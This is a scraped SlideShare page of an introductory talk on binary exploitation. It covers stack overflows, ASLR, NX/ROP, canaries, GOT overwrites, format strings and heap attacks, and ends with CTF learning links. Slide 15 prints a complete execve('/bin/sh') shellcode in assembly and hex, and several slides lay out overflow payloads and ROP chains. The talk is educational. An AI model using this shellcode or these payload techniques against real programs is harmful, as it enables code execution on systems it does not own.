![Proprietary
Proprietary
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address
Stack buffer Overflow
void vuln() {
long local1;
char buf[16];
fgets(buf);
}
Program received signal SIGSEGV, Segmentation fault.
0x4B4B4B4B4A4A4A4A in example1 ()
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[AAAABBBBCCCCDDDD]
[EEEEFFFF]
[GGGGHHHH]
[JJJJKKKK]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-14-320.jpg)
![Proprietary
Proprietary
● No protections present
● No longer viable
● A simple attack
○ Inject code
○ Overwrite return address with
shellcode location
Stack buffer overflow -96
void vuln() {
long local1;
char buf[16];
fgets(buf);
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
0x00007FFFDEADC0DE:
[0x48 0x31 0xd2 0x48 ...]
[...]
[... 0x3b 0x0f 0x05]
[0x00007FFFDEADC0DE]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-16-320.jpg)
![Proprietary
Proprietary
● Shellcode can be moved around
● For example further down the stack
● If exact location is unknown
○ NOP sled
Shellcode placement
void vuln() {
long local1;
char buf[12];
fgets(buf);
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (12 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[prev frame (? bytes)]
0x00007FFFDEADC0DE:
[...] [...]
[...]
[0x00007FFFDEADC102]
[0x48 0x31 0xd2 …]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-17-320.jpg)
![Proprietary
Proprietary
● Address Space Layout Randomization
● Randomize location of stack and heap
○ 32 bit: 12 bit entropy
○ 64 bit: 28 bit entropy
● So far code location still known
● Location of buffer now unknown
● Code reuse
○ Gadgets
Protection: ASLR -01
0x00007FFFCAFECAFE:
jmp rsp
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[prev frame (? bytes)]
0x????????:
[...] [...]
[...]
[0x00007FFFCAFECAFE]
[0x48 0x31 0xd2 …]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-18-320.jpg)
![Proprietary
Proprietary
● Adds permission bits to memory
○ Code: RX
○ Heap+Stack: RW
● Shellcode on stack not possible
● Code location know
● Gadgets
○ Return-oriented programming
Protection: NX/DEP -97
0x4000104A:
...
pop eax
ret
0x4000106A:
...
pop ebx
pop ecx
ret
0x????????:
[AAAA...DDDD]
[EEEE]
[FFFF]
[0x4000104A]
[0xDEADBEEF]
[0x4000106A]
[0xCAFEBABE]
[0xFEEDF00D]
eax = 0xDEADBEEF
ebx = 0xCAFEBABE
ecx = 0xFEEDF00D](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-19-320.jpg)
![Proprietary
Proprietary
● Catch the overflow before damage
● Canary - random secret value
● The crash becomes controlled
● Relies on canary being secret
○ Memory leak
○ Forking servers
Protection: StackGuard -98
void vuln() {
long local1;
char buf[12];
fgets(buf);
}
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
SECRET = ???
[...] [...]
[SECRET]
[saved bp (8 bytes)]
[return address (8 bytes)]
[...] [...]
[0x4141414141414141]
[0x4141414141414141]
[0x00007FFFDEADC0DE]
void vuln() {
push_cookie();
long local1;
char buf[12];
fgets(buf);
check_cookie();
}](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-20-320.jpg)
![Proprietary
Proprietary
● Program Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps
● GOT contains addresses to libraries
● Overwrite GOT entry and call function
GOT/PLT Overwrite
...
call printf@plt
...
printf@plt:
jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFDEADDEAD
...](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-21-320.jpg)
![Proprietary
Proprietary
● RELocation Read Only, RELRO
● “Partial RELRO”
○ GOT before BSS
● Full RELRO
○ Actually Read Only
○ Handled by loader
Protection: RELRO
...
call printf@plt
...
printf@plt:
jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFC0DECAFE
...](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/85/DSC-Introduction-to-Binary-Exploitation-22-320.jpg)
![Proprietary
Proprietary
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address
Stack buffer Overflow
void vuln() {
long local1;
char buf[16];
fgets(buf);
}
Program received signal SIGSEGV, Segmentation fault.
0x4B4B4B4B4A4A4A4A in example1 ()
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[AAAABBBBCCCCDDDD]
[EEEEFFFF]
[GGGGHHHH]
[JJJJKKKK]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-14-2048.jpg)
![Proprietary
Proprietary
● No protections present
● No longer viable
● A simple attack
○ Inject code
○ Overwrite return address with
shellcode location
Stack buffer overflow -96
void vuln() {
long local1;
char buf[16];
fgets(buf);
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
0x00007FFFDEADC0DE:
[0x48 0x31 0xd2 0x48 ...]
[...]
[... 0x3b 0x0f 0x05]
[0x00007FFFDEADC0DE]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-16-2048.jpg)
![Proprietary
Proprietary
● Shellcode can be moved around
● For example further down the stack
● If exact location is unknown
○ NOP sled
Shellcode placement
void vuln() {
long local1;
char buf[12];
fgets(buf);
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (12 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[prev frame (? bytes)]
0x00007FFFDEADC0DE:
[...] [...]
[...]
[0x00007FFFDEADC102]
[0x48 0x31 0xd2 …]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-17-2048.jpg)
![Proprietary
Proprietary
● Address Space Layout Randomization
● Randomize location of stack and heap
○ 32 bit: 12 bit entropy
○ 64 bit: 28 bit entropy
● So far code location still known
● Location of buffer now unknown
● Code reuse
○ Gadgets
Protection: ASLR -01
0x00007FFFCAFECAFE:
jmp rsp
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[prev frame (? bytes)]
0x????????:
[...] [...]
[...]
[0x00007FFFCAFECAFE]
[0x48 0x31 0xd2 …]](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-18-2048.jpg)
![Proprietary
Proprietary
● Adds permission bits to memory
○ Code: RX
○ Heap+Stack: RW
● Shellcode on stack not possible
● Code location know
● Gadgets
○ Return-oriented programming
Protection: NX/DEP -97
0x4000104A:
...
pop eax
ret
0x4000106A:
...
pop ebx
pop ecx
ret
0x????????:
[AAAA...DDDD]
[EEEE]
[FFFF]
[0x4000104A]
[0xDEADBEEF]
[0x4000106A]
[0xCAFEBABE]
[0xFEEDF00D]
eax = 0xDEADBEEF
ebx = 0xCAFEBABE
ecx = 0xFEEDF00D](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-19-2048.jpg)
![Proprietary
Proprietary
● Catch the overflow before damage
● Canary - random secret value
● The crash becomes controlled
● Relies on canary being secret
○ Memory leak
○ Forking servers
Protection: StackGuard -98
void vuln() {
long local1;
char buf[12];
fgets(buf);
}
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
SECRET = ???
[...] [...]
[SECRET]
[saved bp (8 bytes)]
[return address (8 bytes)]
[...] [...]
[0x4141414141414141]
[0x4141414141414141]
[0x00007FFFDEADC0DE]
void vuln() {
push_cookie();
long local1;
char buf[12];
fgets(buf);
check_cookie();
}](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-20-2048.jpg)
![Proprietary
Proprietary
● Program Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps
● GOT contains addresses to libraries
● Overwrite GOT entry and call function
GOT/PLT Overwrite
...
call printf@plt
...
printf@plt:
jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFDEADDEAD
...](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-21-2048.jpg)
![Proprietary
Proprietary
● RELocation Read Only, RELRO
● “Partial RELRO”
○ GOT before BSS
● Full RELRO
○ Actually Read Only
○ Handled by loader
Protection: RELRO
...
call printf@plt
...
printf@plt:
jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFC0DECAFE
...](https://image.slidesharecdn.com/introductiontobinaryexploitation-210201095832/75/DSC-Introduction-to-Binary-Exploitation-22-2048.jpg)
More Related Content
Similar to [DSC] Introduction to Binary Exploitation
![[CCC-28c3] Post Memory Corruption Memory Analysis](https://cdn.slidesharecdn.com/ss_thumbnails/28c3-120107122834-phpapp02-thumbnail.jpg?width=600ounds&width=560&fit=bounds)
![[Ruxcon 2011] Post Memory Corruption Memory Analysis](https://cdn.slidesharecdn.com/ss_thumbnails/ruxcon-111127233040-phpapp02-thumbnail.jpg?width=600ounds&width=560&fit=bounds)
![[Kiwicon 2011] Post Memory Corruption Memory Analysis](https://cdn.slidesharecdn.com/ss_thumbnails/kiwiconbrossard-111127232850-phpapp01-thumbnail.jpg?width=600ounds&width=560&fit=bounds)
[DSC] Introduction to Binary Exploitation
- 1.
- 2. Proprietary Proprietary ● MSc inComputer Science, KTH ● Security Engineer @ Google - Offensive Security ● CTF Player: HackingForSoju ● Email: zetatwo@google.com / Twitter: @zetatwo Biography
- 3. Proprietary Agenda ● Background ● Stack-basedExploitation ● Protections and bypasses ● Heap-based exploitations ● Next steps
- 4.
- 5. Proprietary Proprietary ● Programmer ● SecurityInterested ● Basic knowledge of some low-level language, e.g. C or C++ ● Basic understanding of operating systems Who Are You?
- 6. Proprietary Proprietary What is anExploit? ● Unintended behaviour ● State machine ○ Initial state ○ Reachable state ○ Invalid state ● Vulnerability ○ Unintended transition (bug) ○ Enabling an exploit ● Exploit ○ Transition to an Invalid state ○ "Dangerous" subset
- 7. Proprietary Proprietary A Note onData ● We organize bits into groups - nibble, byte, word, dword, qword ● Bits are interpreted as integers, text, code, addresses, etc. ● Same data, different interpretations - Context determines ● Remember endianness - Little vs big 65, 66, 67, 68 "ABCD" inc ecx; inc edx; inc ebx; inc esp 0x44434241 = 1145258561 Little: 0x44332211 = 0x11 0x22 0x33 0x44 Big: 0x44332211 = 0x44 0x33 0x22 0x11
- 8. Proprietary Proprietary Where are We? ●Physics - Maxwell’s equations ● Circuits - Gates, flip-flops, wires ● Micro-architecture - Internals of CPU ● Machine code - Assembly translated to bytes ● Low-level code - C, Rust ● Mid-level code - Java, C# ● High-level code - Python, Javascript
- 9.
- 10. Proprietary Proprietary ● Virtual memory ●Stack ● Heap ● Code - Text x86 Memory
- 11. Proprietary Proprietary ● General purpose ○RAX, RBX, RCX, RDX ○ RDI, RSI, R8, R9 ● Special purpose ○ RIP, RBP, RSP ● ...and a few hundred more x86 Registers
- 12. Proprietary Proprietary ● Architecture specific ●x86, 32 bit, 64 bit ● Arguments ○ 32 bit: stack in reverse order ○ 64 bit: first few in registers ● Stack frame - base pointer x86 Calling convention call 0xCAFEC0DE ... push eip+5 jmp 0xCAFEC0DE call rip+0x1337 ... push rip+5 jmp rip+0x1337 ret pop eip ret pop rip f(a, b) push b; push a call f f(a, b) mov rdi a; mov rsi b; call f
- 13.
- 14. Proprietary Proprietary ● Unchecked write ●Overwrite adjacent memory ● Overwrite return address Stack buffer Overflow void vuln() { long local1; char buf[16]; fgets(buf); } Program received signal SIGSEGV, Segmentation fault. 0x4B4B4B4B4A4A4A4A in example1 () [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [AAAABBBBCCCCDDDD] [EEEEFFFF] [GGGGHHHH] [JJJJKKKK]
- 15. Proprietary Proprietary ● Code thatlaunches a shell ● Can also do other things ● Mostly written in C or ASM ● Needs to be location independent Shellcode xor rdx, rdx mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax push rdi mov rsi, rsp mov al, 0x3b syscall 0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7 0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
- 16. Proprietary Proprietary ● No protectionspresent ● No longer viable ● A simple attack ○ Inject code ○ Overwrite return address with shellcode location Stack buffer overflow -96 void vuln() { long local1; char buf[16]; fgets(buf); } $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] 0x00007FFFDEADC0DE: [0x48 0x31 0xd2 0x48 ...] [...] [... 0x3b 0x0f 0x05] [0x00007FFFDEADC0DE]
- 17. Proprietary Proprietary ● Shellcode canbe moved around ● For example further down the stack ● If exact location is unknown ○ NOP sled Shellcode placement void vuln() { long local1; char buf[12]; fgets(buf); } $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (12 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)] 0x00007FFFDEADC0DE: [...] [...] [...] [0x00007FFFDEADC102] [0x48 0x31 0xd2 …]
- 18. Proprietary Proprietary ● Address SpaceLayout Randomization ● Randomize location of stack and heap ○ 32 bit: 12 bit entropy ○ 64 bit: 28 bit entropy ● So far code location still known ● Location of buffer now unknown ● Code reuse ○ Gadgets Protection: ASLR -01 0x00007FFFCAFECAFE: jmp rsp $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)] 0x????????: [...] [...] [...] [0x00007FFFCAFECAFE] [0x48 0x31 0xd2 …]
- 19. Proprietary Proprietary ● Adds permissionbits to memory ○ Code: RX ○ Heap+Stack: RW ● Shellcode on stack not possible ● Code location know ● Gadgets ○ Return-oriented programming Protection: NX/DEP -97 0x4000104A: ... pop eax ret 0x4000106A: ... pop ebx pop ecx ret 0x????????: [AAAA...DDDD] [EEEE] [FFFF] [0x4000104A] [0xDEADBEEF] [0x4000106A] [0xCAFEBABE] [0xFEEDF00D] eax = 0xDEADBEEF ebx = 0xCAFEBABE ecx = 0xFEEDF00D
- 20. Proprietary Proprietary ● Catch theoverflow before damage ● Canary - random secret value ● The crash becomes controlled ● Relies on canary being secret ○ Memory leak ○ Forking servers Protection: StackGuard -98 void vuln() { long local1; char buf[12]; fgets(buf); } *** stack smashing detected ***: ./a.out terminated ======= Backtrace: ========= SECRET = ??? [...] [...] [SECRET] [saved bp (8 bytes)] [return address (8 bytes)] [...] [...] [0x4141414141414141] [0x4141414141414141] [0x00007FFFDEADC0DE] void vuln() { push_cookie(); long local1; char buf[12]; fgets(buf); check_cookie(); }
- 21. Proprietary Proprietary ● Program LinkageTable, PLT ● Global Offset Table, GOT ● PLT contains stubs with jumps ● GOT contains addresses to libraries ● Overwrite GOT entry and call function GOT/PLT Overwrite ... call printf@plt ... printf@plt: jmp [printf@got] printf@got: 0x7FFFC0DECAFE printf@got: 0x7FFFDEADDEAD … call printf@plt -> 0x7FFFDEADDEAD ...
- 22. Proprietary Proprietary ● RELocation ReadOnly, RELRO ● “Partial RELRO” ○ GOT before BSS ● Full RELRO ○ Actually Read Only ○ Handled by loader Protection: RELRO ... call printf@plt ... printf@plt: jmp [printf@got] printf@got: 0x7FFFC0DECAFE printf@got: 0x7FFFDEADDEAD … call printf@plt -> 0x7FFFC0DECAFE ...
- 23. Proprietary Proprietary ● Stack frames- linked list ● Misalign stack frame ○ Modify local variables ○ Modify stack pointer ● Partial overwrite ○ Shift stack frame Base Pointer Overwrite
- 24. Proprietary Proprietary ● Control FlowGuard ● Control Flow Integrity ● Intended to prevent code-reuse attacks ● Bypass example: JIT Protection: CFG (-14)
- 25. Proprietary Proprietary ● Pointer AuthenticationCode ● Reuse unused bits for MAC ● Hardware support ● ARM64, Apple iOS ● Bypass: signing oracle ○ Project Zero blog Protection: PAC (-17)
- 26. Proprietary Proprietary ● Calls toprintf-like functions ● Control over first argument ● Variable number of arguments ● Read direct: %x/%d ● Read indirect: %s ● Write: %n ● Copy: %0*x, %n ● Skip: %4$x Format String Vulnerability int printf ( const char * format, ... ); printf("Name: %s, age: %d", name, age); // Ok printf(name); // Vulnerable
- 27.
- 28. Proprietary Proprietary ● Physical ● Virtual ●Pages ● Memory allocator ○ malloc/free ○ glibc ○ jemalloc A Refresher on Memory
- 29. Proprietary Proprietary ● Heap overflow ●Use after free ● Type confusion ● Heap spraying Heap corruption: app layer
- 30. Proprietary Proprietary ● Corrupt allocatormetadata ● Linked lists ● Requires understanding of allocator ○ Slabs ○ Bins ○ Cache ● glibc - House of X Heap corruption: allocator
- 31.
- 32. Proprietary Want to tryit out? Capture the Flag Wargames Community https://capturetheflag.withgoogle.com https://ctftime.org https://picoctf.com https://github.com/zardus/wargame-nexus https://pwnable.kr https://overthewire.org CTF players Discord: https://discord.gg/ArjWjvctft
- 33. Proprietary Further Materials Videos ToolsLearning https://securitycreators.video https://www.youtube.com/GynvaelEN https://www.youtube.com/ZetaTwo https://www.youtube.com/LiveOverflow Python + Pwntools gdb + gef IDA, Binary Ninja, Ghidra https://pwn.college https://github.com/RPISEC/MBE https://github.com/shellphish/how2heap
- 34. Proprietary Interested in Google? Internships andfull-time positions: https://careers.google.com/students Questions about working at Google, specifically security: Email zetatwo@google.com or Twitter @zetatwo
- 35.